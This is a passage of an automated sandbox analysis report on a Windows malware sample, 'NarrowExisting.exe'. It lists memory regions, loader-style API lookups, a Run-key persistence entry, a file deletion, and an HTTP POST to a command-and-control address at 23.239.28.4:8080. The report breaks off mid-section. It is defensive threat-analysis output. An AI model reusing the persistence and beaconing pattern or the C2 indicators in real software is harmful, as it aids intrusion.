| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #7: narrowexisting.exe
54
20
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x734 |
| Parent PID | 0x82c (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
858
0x
6A0
0x
710
0x
458
0x
75C
0x
730
0x
878
0x
64
0x
89C
0x
898
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003e0000 | 0x003e0fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x003e0000 | 0x003ebfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0066ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0083ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00840000 | 0x00847fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01eeffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x01ef0000 | 0x01efbfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f60000 | 0x01f60000 | 0x02352fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02360000 | 0x0262efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0272ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x02730000 | 0x0276bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x0276ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028b0000 | 0x028b0000 | 0x028b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02afffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002e00000 | 0x02e00000 | 0x02efffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002f00000 | 0x02f00000 | 0x02ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x030bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x031bffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73cc0000 | 0x73e5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x74300000 | 0x7433bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x74340000 | 0x74399fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x74600000 | 0x74604fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x74670000 | 0x74677fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74680000 | 0x7468dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74690000 | 0x74695fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x746a0000 | 0x746affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x746b0000 | 0x746b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x746c0000 | 0x746ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x746d0000 | 0x746d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x746e0000 | 0x746fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74700000 | 0x74743fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74750000 | 0x7478afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770a0000 | 0x770a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 4 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe | - |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
2 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
2 |
Module (30)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
3 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = Ticks, time = 177716 |
|
1 | |
| Get Time | type = Ticks, time = 178730 |
|
1 | |
| Get Time | type = Ticks, time = 179728 |
|
1 | |
| Get Time | type = Ticks, time = 180727 |
|
1 | |
| Get Time | type = Ticks, time = 181725 |
|
1 | |
| Get Time | type = Ticks, time = 182723 |
|
1 | |
| Get Time | type = Ticks, time = 184096 |
|
1 | |
| Get Time | type = Ticks, time = 184798 |
|
1 | |
| Get Time | type = Ticks, time = 185875 |
|
1 | |
| Get Time | type = Ticks, time = 187201 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 658 bytes |
| Total Data Received | 134.24 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 23.239.28.4 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 68732 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 68724, size_out = 68724 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
